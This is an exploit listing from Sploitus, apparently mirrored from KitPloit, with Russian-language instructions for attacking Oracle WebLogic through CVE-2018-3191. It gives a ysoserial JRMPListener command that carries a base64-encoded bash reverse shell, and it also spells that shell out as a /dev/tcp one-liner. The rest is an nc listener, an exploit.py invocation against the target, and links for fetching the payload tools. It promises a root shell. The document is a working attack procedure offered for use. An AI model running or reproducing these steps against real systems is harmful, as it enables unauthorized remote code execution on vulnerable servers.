Sploitus

Exploit for CVE-2018-3191

kitploit · 2026-08-27

Exploit Code

MARKDOWN21 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-LIBRAGGBOND-CVE-2018-3191
# CVE-2018-3191

CVE-2018-3191 обратная оболочка Локальный IP: 172.16.38.1 Weblogic: 172.16.38.174:7001

  1. Локальное выполнение: java -cp ysoserial-master.jar ysoserial.exploit.JRMPListener 2222 CommonsCollections1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMzguMS83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}'



Затем выполнить nc -lvv 7777

(1) Команда bash, чтобы избежать экранирования специальных символов при выполнении Runtime.getRuntime().exec(), была закодирована и декодирована в base64. Открытый текст: bash -i >& /dev/tcp/172.16.38.1/7777 0>&1 (2) Эта операция запускает локальный JRMPListener, который принимает запросы от атакуемого WebLogic и выполняет указанную команду bash для обратного подключения. (3) Nc прослушивает порт 7777 в ожидании обратного подключения bash от хоста WebLogic.

  2. Выполнение: python exploit.py 172.16.38.247 7001 weblogic-spring-jndi-10.3.6.0.jar 172.16.38.1 2222, используя уязвимость, заставляет WebLogic обратиться к удаленному RMI-сервису и выполнить команду bash для обратного подключения.

  3. Порт, прослушиваемый nc, получает обратную оболочку bash с правами root.




Необходимые инструменты: ysoserial-master.jar // Инструмент для эксплуатации десериализации https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar weblogic-spring-jndi-10.3.6.0.jar // Генератор полезной нагрузки CVE-2018-3191 https://github.com/voidfyoo/CVE-2018-3191/releases exploit.py // Инструмент для отправки по протоколу T3 WebLogic, интегрирующий полезную нагрузку CVE-2018-3191